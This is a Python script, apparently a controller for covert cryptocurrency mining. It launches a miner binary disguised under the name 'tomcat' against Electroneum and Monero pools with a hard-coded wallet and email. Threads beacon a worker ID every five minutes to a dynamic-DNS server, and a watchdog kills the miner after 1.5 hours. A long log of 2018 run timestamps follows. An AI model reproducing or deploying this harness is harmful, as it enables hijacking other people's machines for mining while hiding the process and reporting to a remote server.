import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:04.943263
#2018-02-17 16:42:05.419735
#2018-02-17 18:28:07.122981
#2018-02-17 20:17:06.963681
#2018-02-17 22:05:04.224257
#2018-02-17 23:49:05.916149
#2018-02-18 01:39:05.197281
#2018-02-18 03:26:02.183663
#2018-02-18 05:14:02.193743
#2018-02-18 07:06:04.873081
#2018-02-18 08:54:06.835691
#2018-02-18 10:41:06.243982
#2018-02-18 12:26:06.986007
#2018-02-18 14:14:03.582275
#2018-02-18 16:04:02.164739
#2018-02-18 17:53:05.122987
#2018-02-18 19:40:05.677902
#2018-02-18 21:25:06.735246
#2018-02-18 23:14:05.857767
#2018-02-19 01:01:03.876614
#2018-02-19 02:48:05.267013
#2018-02-19 04:34:04.459110
#2018-02-19 06:19:05.760975
#2018-02-19 08:07:02.088073
#2018-02-19 09:57:01.236144
#2018-02-19 11:47:08.175042
#2018-02-19 13:34:07.402341
#2018-02-19 15:23:06.896419
#2018-02-19 17:10:09.122353
#2018-02-19 18:58:02.224804
#2018-02-19 20:45:08.696403
#2018-02-19 22:32:07.084400
#2018-02-20 00:18:06.791400
#2018-02-20 02:06:04.498021
#2018-02-20 03:55:01.496421
#2018-02-20 05:39:06.722613
#2018-02-20 07:24:07.055562
#2018-02-20 09:10:07.494033
#2018-02-20 10:53:06.320944
#2018-02-20 12:41:04.291825
#2018-02-20 14:26:04.448158
#2018-02-20 16:10:16.098713
#2018-02-20 17:57:09.411287
#2018-02-20 19:48:08.169833
#2018-02-20 21:37:07.412799
#2018-02-20 23:20:03.113163
#2018-02-21 01:06:01.867926
#2018-02-21 02:52:07.682676
#2018-02-21 04:40:08.704538
#2018-02-21 06:27:06.677724
#2018-02-21 08:12:08.107359
#2018-02-21 09:59:01.960099
#2018-02-21 11:47:05.801360
#2018-02-21 13:38:01.450146
#2018-02-21 15:22:05.194911
#2018-02-21 17:13:01.764375
#2018-02-21 19:00:04.012051
#2018-02-21 20:46:01.500361
#2018-02-21 22:30:07.232667
#2018-02-22 00:20:04.283861
#2018-02-22 02:08:01.300486
#2018-02-22 03:54:07.085394
#2018-02-22 05:41:07.506688
#2018-02-22 07:27:03.877989
#2018-02-22 09:15:07.883444
#2018-02-22 11:02:07.897629
#2018-02-22 12:50:06.490623
#2018-02-22 14:36:10.649921
#2018-02-22 16:22:04.425062
#2018-02-22 18:09:05.634234
#2018-02-22 19:57:01.782324
#2018-02-22 21:46:02.161143
#2018-02-22 23:33:07.555304
#2018-02-23 01:21:06.082091
#2018-02-23 03:07:04.550227
#2018-02-23 04:55:05.563792
#2018-02-23 06:41:05.391502
#2018-02-23 08:31:04.453111
#2018-02-23 10:45:02.886665
#2018-02-23 12:43:01.848864
#2018-02-23 14:27:04.422565
#2018-02-23 16:19:07.114979
#2018-02-23 18:05:08.451770
#2018-02-23 19:51:04.532884
#2018-02-23 21:33:07.436762
#2018-02-23 23:20:06.693241
#2018-02-24 01:09:04.910717
#2018-02-24 03:02:03.479422
#2018-02-24 04:48:05.095340
#2018-02-24 06:34:05.867739
#2018-02-24 08:22:06.396332
#2018-02-24 10:05:06.643690
#2018-02-24 12:02:07.251663
#2018-02-24 13:50:01.389969
#2018-02-24 15:41:04.011231
#2018-02-24 17:34:06.313875
#2018-02-24 19:20:06.376990
#2018-02-24 21:10:01.909272
#2018-02-24 23:43:04.412370
#2018-02-25 03:37:05.998280
#2018-02-25 07:15:07.784411